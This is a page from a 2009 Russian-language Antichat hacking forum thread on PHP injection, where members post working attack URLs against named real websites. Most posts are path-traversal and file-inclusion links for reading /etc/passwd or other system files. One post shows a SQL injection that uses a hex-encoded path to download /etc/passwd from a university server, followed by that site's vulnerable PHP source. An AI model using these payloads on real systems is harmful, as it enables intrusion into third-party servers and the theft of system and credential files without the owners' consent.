HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 97 из 143 « Первая < 4787 93 94 95 96 97 98 99 100 101 107 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #961  
Старый 30.08.2009, 22:46
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию
http://pvp-game.ru/index.php?act=../index цикл index.php
 
Ответить с цитированием

  #962  
Старый 07.09.2009, 20:16
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
По умолчанию
Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

Код:
http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--
Идёт файл на загрузку, в имени файла вывод:

5.0.51a-3ubuntu5.4

подставим своё значение:
magic qutes = on, поэжтому захексим

Код:
http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--
И скачиваем /etc/passwd

presentations.php

PHP код:
    error_reporting(0);
    mysql_connect("localhost","*","*");
    mysql_select_db"owls08" );
    error_reporting(1);

    $id mysql_real_escape_string$_REQUEST['id'] );

    $query="SELECT file from presentations where id=$id";
    $result mysql_query$query ) or die( mysql_error() );
    $row mysql_fetch_array$result );

    $file $row['file'];
    
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

    header("Content-Type: application/force-download");
    header"Content-Disposition: attachment; filename=".basename($file));
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".filesize($file));
    header"Content-Description: File Transfer");
    @readfile($file); 
 
Ответить с цитированием

  #963  
Старый 13.09.2009, 04:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию
http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #964  
Старый 13.09.2009, 10:42
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию
Код:
http://www.duma.gov.ru/index.jsp?t=./index.jsp
 
Ответить с цитированием

  #965  
Старый 13.09.2009, 13:46
DFrost
Познающий
Регистрация: 05.06.2009
Сообщений: 41
Провел на форуме:
258796

Репутация: 72
По умолчанию
Код:
http://www.summerschoolalpbach.at/index.php?file=index.php
Код:
http://www.b2match.com/watervienna09/index.php?file=index.php
Код:
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd
Последний раз редактировалось DFrost; 13.09.2009 в 14:29..
 
Ответить с цитированием

  #966  
Старый 15.09.2009, 00:29
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию
http://sdm.mit.edu/index.php?fileName=index.php
 
Ответить с цитированием

  #967  
Старый 16.09.2009, 21:13
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию
http://stroycement.ru/stat.php?p=../../../../etc/passwd
 
Ответить с цитированием

  #968  
Старый 19.09.2009, 10:09
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://dnfo.ru/page.php?p=../page
http://www.kamp.ru/page.php?p=page&board=1
Последний раз редактировалось HAXTA4OK; 19.09.2009 в 10:22..
 
Ответить с цитированием

  #969  
Старый 19.09.2009, 19:05
DFrost
Познающий
Регистрация: 05.06.2009
Сообщений: 41
Провел на форуме:
258796

Репутация: 72
По умолчанию
European investment banking firm
Код:
http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd
Последний раз редактировалось DFrost; 19.09.2009 в 21:50..
 
Ответить с цитированием

  #970  
Старый 26.09.2009, 00:45
DeepBlue7
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073

Репутация: 44
По умолчанию
http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd
Последний раз редактировалось jokester; 26.09.2009 в 00:53.. Причина: b2match.com БОЯН
 
Ответить с цитированием
Ответ
Страница 97 из 143 « Первая < 4787 93 94 95 96 97 98 99 100 101 107 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.